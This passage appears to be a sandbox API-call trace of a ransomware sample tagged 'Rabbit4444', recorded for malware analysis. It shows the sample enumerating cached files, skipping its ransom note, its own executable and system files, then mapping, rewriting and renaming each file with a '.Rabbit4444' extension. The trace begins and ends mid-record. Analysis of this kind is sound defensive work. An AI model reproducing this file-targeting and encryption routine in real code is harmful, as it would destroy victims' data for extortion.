[0069.780] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16109116364) returned 1 [0069.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0069.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0069.781] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.781] CloseHandle (hObject=0x29c) returned 1 [0069.781] CloseHandle (hObject=0x280) returned 1 [0069.781] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt.Rabbit4444") returned 197 [0069.781] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_6[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_6[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.782] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8e50659, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8e50659, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd067ccf2, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x48d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", cAlternateFileName="C_BD17~1.TXT")) returned 1 [0069.782] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.782] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.782] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.782] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", lpString2=".") returned 1 [0069.782] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", lpString2="..") returned 1 [0069.782] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", lpString2="windows") returned -1 [0069.782] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", lpString2="bootmgr") returned 1 [0069.782] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", lpString2="pagefile.sys") returned -1 [0069.782] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", lpString2="boot") returned 1 [0069.782] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", lpString2="ids.txt") returned -1 [0069.782] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.783] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt" [0069.783] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", dwFileAttributes=0x2000) returned 1 [0069.783] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt") returned 84 [0069.783] lstrlenW (lpString="Rabbit4444") returned 10 [0069.783] lstrcmpiW (lpString1="p_7[1].txt", lpString2="Rabbit4444") returned -1 [0069.783] lstrlenW (lpString=".dll") returned 4 [0069.783] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.783] lstrlenW (lpString=".lnk") returned 4 [0069.783] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.783] lstrlenW (lpString=".ini") returned 4 [0069.783] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.783] lstrlenW (lpString=".sys") returned 4 [0069.783] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.783] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_7[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.784] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.784] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16109430591) returned 1 [0069.784] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=18640) returned 1 [0069.784] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0069.784] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0069.784] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4bd0, lpName=0x0) returned 0x29c [0069.785] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4bd0) returned 0x70000 [0069.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0069.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0069.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0069.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.787] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0069.787] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16109824797) returned 1 [0069.788] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0069.788] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0069.788] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.788] CloseHandle (hObject=0x29c) returned 1 [0069.788] CloseHandle (hObject=0x280) returned 1 [0069.788] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt.Rabbit4444") returned 197 [0069.788] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_7[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_7[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.789] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8e768a9, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8e768a9, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd0656a94, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x127f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", cAlternateFileName="C_37E1~1.TXT")) returned 1 [0069.789] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.789] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.789] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.789] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", lpString2=".") returned 1 [0069.789] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", lpString2="..") returned 1 [0069.789] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", lpString2="windows") returned -1 [0069.789] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", lpString2="bootmgr") returned 1 [0069.789] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", lpString2="pagefile.sys") returned -1 [0069.789] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", lpString2="boot") returned 1 [0069.789] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", lpString2="ids.txt") returned -1 [0069.789] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.789] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt" [0069.789] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", dwFileAttributes=0x2000) returned 1 [0069.789] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt") returned 84 [0069.790] lstrlenW (lpString="Rabbit4444") returned 10 [0069.790] lstrcmpiW (lpString1="p_8[1].txt", lpString2="Rabbit4444") returned -1 [0069.790] lstrlenW (lpString=".dll") returned 4 [0069.790] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.790] lstrlenW (lpString=".lnk") returned 4 [0069.790] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.790] lstrlenW (lpString=".ini") returned 4 [0069.790] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.790] lstrlenW (lpString=".sys") returned 4 [0069.790] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.790] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_8[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.790] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.790] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16110098417) returned 1 [0069.790] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=75766) returned 1 [0069.790] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0069.790] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0069.790] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12b00, lpName=0x0) returned 0x29c [0069.792] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12b00) returned 0x70000 [0069.796] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.796] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0069.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.796] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0069.796] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0069.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0069.796] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16110693951) returned 1 [0069.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0069.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0069.796] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.797] CloseHandle (hObject=0x29c) returned 1 [0069.797] CloseHandle (hObject=0x280) returned 1 [0069.797] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt.Rabbit4444") returned 197 [0069.797] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_8[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_8[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.798] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8e9cb14, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8e9cb14, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd0656a94, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x576e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", cAlternateFileName="C_0E6D~1.TXT")) returned 1 [0069.798] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.798] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.798] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.798] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", lpString2=".") returned 1 [0069.798] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", lpString2="..") returned 1 [0069.798] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", lpString2="windows") returned -1 [0069.798] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", lpString2="bootmgr") returned 1 [0069.798] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", lpString2="pagefile.sys") returned -1 [0069.798] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", lpString2="boot") returned 1 [0069.798] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", lpString2="ids.txt") returned -1 [0069.798] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.798] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt" [0069.798] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", dwFileAttributes=0x2000) returned 1 [0069.799] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt") returned 84 [0069.799] lstrlenW (lpString="Rabbit4444") returned 10 [0069.799] lstrcmpiW (lpString1="p_9[1].txt", lpString2="Rabbit4444") returned -1 [0069.799] lstrlenW (lpString=".dll") returned 4 [0069.799] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.799] lstrlenW (lpString=".lnk") returned 4 [0069.799] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.799] lstrlenW (lpString=".ini") returned 4 [0069.799] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.799] lstrlenW (lpString=".sys") returned 4 [0069.799] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.799] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_9[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.799] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.799] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16111024431) returned 1 [0069.800] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=22382) returned 1 [0069.800] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0069.800] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0069.800] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5a70, lpName=0x0) returned 0x29c [0069.803] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5a70) returned 0x70000 [0069.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0069.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0069.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0069.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0069.806] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16111677929) returned 1 [0069.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0069.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0069.806] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.806] CloseHandle (hObject=0x29c) returned 1 [0069.807] CloseHandle (hObject=0x280) returned 1 [0069.807] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt.Rabbit4444") returned 197 [0069.807] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_9[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_9[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.808] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8e9cb14, ftCreationTime.dwHighDateTime=0x1d32743, 